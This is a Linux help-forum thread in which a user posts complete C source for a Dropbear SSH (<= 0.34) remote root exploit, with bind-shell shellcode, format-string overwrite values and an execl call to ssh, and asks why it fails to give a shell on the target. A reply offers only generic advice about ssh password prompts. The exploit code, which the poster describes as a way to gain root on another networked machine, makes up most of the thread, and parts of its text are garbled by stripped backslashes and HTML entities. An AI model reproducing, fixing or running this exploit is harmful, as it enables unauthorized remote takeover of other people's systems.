Find the answer to your Linux question:
Results 1 to 2 of 2
This is a program to gain root remotely of a machine in the network........ I am using the execl command to execute the ssh command.........and passing username thru the variable ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Mar 2005
    Posts
    41

    help with execl


    This is a program to gain root remotely of a machine in the network........ I am using the execl command to execute the ssh command.........and passing username thru the variable fmt with other options (such as -l, -m).......But still the command doesnt execute on terminal and doesnt give shell on other machine.....

    What seems to be wrong......... (Usage is ./a.out IP)

    Code:
    #include <stdio.h> 
    
    #include <stdlib.h> 
    
    #include <unistd.h> 
    
    #include <string.h> 
    
    
    
    
    
    #define SSH_PATH               "ssh" 
    
    #define SSH_PORT               "22" 
    
    
    
    #define DEFAULT_VERSION_PAD     24 
    
    #define DEFAULT_RETLOC         0xbffff800 
    
    #define DEFAULT_RETADDR         0x080e /* 2 byte retaddr, not enough space for a 
    
                                          * full overwrite. */ 
    
    
    
    
    
    /* fork/bind shellcode by live 
    
    * default port is 10275 
    
    * 
    
    * I believe this can be futher optmized, but size is not 
    
    * an issue here since we are sending the shellcode through 
    
    * a ssh variable which is about 30k bytes long. 
    
    */ 
    
    char shellcode&#91;&#93; = 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "xb0x02"                       /* mov     $0x2,%al                 */ 
    
        "xcdx80"                       /* int     $0x80                   */ 
    
        "x85xc0"                       /* test   %eax,%eax               */ 
    
        "x75x54"                       /* jne     5e                       */ 
    
        "xebx50"                       /* jmp     5c                       */ 
    
        "x5e"                           /* pop     %esi                     */ 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "x31xdb"                       /* xor     %ebx,%ebx               */ 
    
        "x89x46x08"                   /* mov     %eax,0x8&#40;%esi&#41;           */ 
    
        "xb0x02"                       /* mov     $0x2,%al                 */ 
    
        "x89x06"                       /* mov     %eax,&#40;%esi&#41;             */ 
    
        "xfexc8"                       /* dec     %al                     */ 
    
        "x89x46x04"                   /* mov     %eax,0x4&#40;%esi&#41;           */ 
    
        "xb0x66"                       /* mov     $0x66,%al               */ 
    
        "xfexc3"                       /* inc     %bl                     */ 
    
        "x89xf1"                       /* mov     %esi,%ecx               */ 
    
        "xcdx80"                       /* int     $0x80                   */ 
    
        "x89x06"                       /* mov     %eax,&#40;%esi&#41;             */ 
    
        "x89x4ex04"                   /* mov     %ecx,0x4&#40;%esi&#41;           */ 
        "x80x46x04x0c"               /* addb   $0xc,0x4&#40;%esi&#41;           */ 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "xb0x10"                       /* mov     $0x10,%al               */ 
    
        "x89x46x08"                   /* mov     %eax,0x8&#40;%esi&#41;           */ 
    
        "xb0x02"                       /* mov     $0x2,%al                 */ 
    
        "x66x89x46x0c"               /* mov     %ax,0xc&#40;%esi&#41;           */ 
    
        "x66xb8x28x23"               /* mov     $0x2328,%ax             */ 
    
        "x89x46x0e"                   /* mov     %eax,0xe&#40;%esi&#41;           */ 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "x89x46x10"                   /* mov     %eax,0x10&#40;%esi&#41;         */ 
    
        "xb0x66"                       /* mov     $0x66,%al               */ 
    
        "xfexc3"                       /* inc     %bl                     */ 
    
        "xcdx80"                       /* int     $0x80                   */ 
    
        "xfexcb"                       /* dec     %bl                     */ 
    
        "x89x5ex04"                   /* mov     %ebx,0x4&#40;%esi&#41;           */ 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "xb0x66"                       /* mov     $0x66,%al               */ 
    
        "xb3x04"                       /* mov     $0x4,%bl                 */ 
    
        "xcdx80"                       /* int     $0x80                   */ 
    
        "xebx04"                       /* jmp     60                       */ 
    
        "xebx44"                       /* jmp     a2                       */ 
    
        "xebx3a"                       /* jmp     9a                       */ 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "x89x46x04"                   /* mov     %eax,0x4&#40;%esi&#41;           */ 
    
        "x89x46x08"                   /* mov     %eax,0x8&#40;%esi&#41;           */ 
    
        "xb0x66"                       /* mov     $0x66,%al               */ 
    
        "xfexc3"                       /* inc     %bl                     */ 
    
        "xcdx80"                       /* int     $0x80                   */ 
    
        "x31xc9"                       /* xor     %ecx,%ecx               */ 
    
        "x89xc3"                       /* mov     %eax,%ebx               */ 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "xb0x3f"                       /* mov     $0x3f,%al               */ 
    
        "xcdx80"                       /* int     $0x80                   */ 
    
        "xfexc1"                       /* inc     %cl                     */ 
    
        "x80xf9x03"                   /* cmp     $0x3,%cl                 */ 
        "x75xf3"                       /* jne     72                       */ 
    
        "x68x2fx2fx73x68"           /* push   $0x68732f2f             */ 
    
        "x68x2fx62x69x6e"           /* push   $0x6e69622f             */ 
    
        "x89xe3"                       /* mov     %esp,%ebx               */ 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "x88x43x08"                   /* mov     %al,0x8&#40;%ebx&#41;           */ 
    
        "x50"                           /* push   %eax                     */ 
    
        "x53"                           /* push   %ebx                     */ 
    
        "x89xe1"                       /* mov     %esp,%ecx               */ 
    
        "x89xe2"                       /* mov     %esp,%edx               */ 
    
        "xb0x0b"                       /* mov     $0xb,%al                 */ 
    
        "xcdx80"                       /* int     $0x80                   */ 
    
        "x31xc0"                       /* xor     %eax,%eax               */ 
    
        "x31xdb"                       /* xor     %ebx,%ebx               */ 
    
        "xfexc0"                       /* inc     %al                     */ 
    
        "xcdx80"                       /* int     $0x80                   */ 
    
        "xe8x65xffxffxff"           /* call   c <up>                   */ 
    
    ; 
    
    
    
    static void usage&#40;const char *progname&#41;; 
    
    
    
    
    
    int main&#40;int argc, char *argv&#91;&#93;&#41; 
    
    &#123; 
    
        char buffer&#91;29500&#93;, fmt&#91;26&#93;, *target; 
    
        long int retloc, retaddr; 
    
        int ch, version_pad; 
    
    
    
        retloc           = DEFAULT_RETLOC +1; 
    
        retaddr         = DEFAULT_RETADDR -40; 
    
        version_pad     = DEFAULT_VERSION_PAD; 
    
    
    
        while &#40; &#40;ch = getopt&#40;argc, argv, "l&#58;r&#58;v&#58;"&#41;&#41; != -1&#41; &#123; 
    
            switch &#40;ch&#41; &#123; 
    
                case 'l'&#58; 
    
                    retloc += atoi&#40;optarg&#41; *4; 
    
                    break; 
    
                case 'r'&#58; 
    
                    retaddr += atoi&#40;optarg&#41; *4; 
    
                    break; 
    
                case 'v'&#58; 
    
                    version_pad = atoi&#40;optarg&#41;; 
    
                    break; 
    
            &#125; 
    
        &#125; 
    
    
    
        if &#40;argc -optind != 1&#41; &#123; 
    
            usage&#40;argv&#91;0&#93;&#41;; 
    
            exit&#40;-1&#41;; 
    
        &#125; 
    
        argc -= optind; 
    
        argv += optind; 
    
    
    
        target = argv&#91;0&#93;; 
    
        memset&#40;buffer, 0x90, 29500&#41;; 
    
        memcpy&#40;buffer +29500 -strlen&#40;shellcode&#41;, shellcode, strlen&#40;shellcode&#41;&#41;; 
    
        memcpy&#40;buffer, "SHELLCODE=", 10&#41;; 
    
    
    
        putenv&#40;buffer&#41;; 
    
        snprintf&#40;fmt, sizeof fmt, "%c%c%c%c%%.%du%%%d$hn", 
    
            &#40;retloc & 0xff&#41;, 
    
            &#40;retloc & 0xff00&#41; >> 8, 
    
            &#40;retloc & 0xff0000&#41; >> 16, 
    
            &#40;retloc & 0xff000000&#41; >> 24, 
    
            retaddr, 
    
            version_pad&#41;; 
    
    
    
        execl&#40;SSH_PATH, "ssh", "-l", fmt, "-p", SSH_PORT, target, NULL&#41;; 
    
        exit&#40;0&#41;; 
    
    &#125; 
    
    
    static void usage&#40;const char *progname&#41; &#123; 
    
        fprintf&#40;stderr, "Linux x86 Dropbear SSH <= 0.34 remote root exploitn"&#41;; 
    
        fprintf&#40;stderr, "coded by livenn"&#41;; 
    
        fprintf&#40;stderr, "Usage&#58; %s &#91;-l <retloc offset>&#93; &#91;-r <retaddr offset>&#93;" 
    
            " &#91;-v <version pad>&#93; <target>\n", progname&#41;; 
    
    &#125;
    [/code]

  2. #2
    Linux Newbie
    Join Date
    Mar 2005
    Posts
    230
    The problem is that ssh prompts for password information to the terminal if it can find it. The only way I have been able to get remote command execution working from programs was by setting up private keys.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •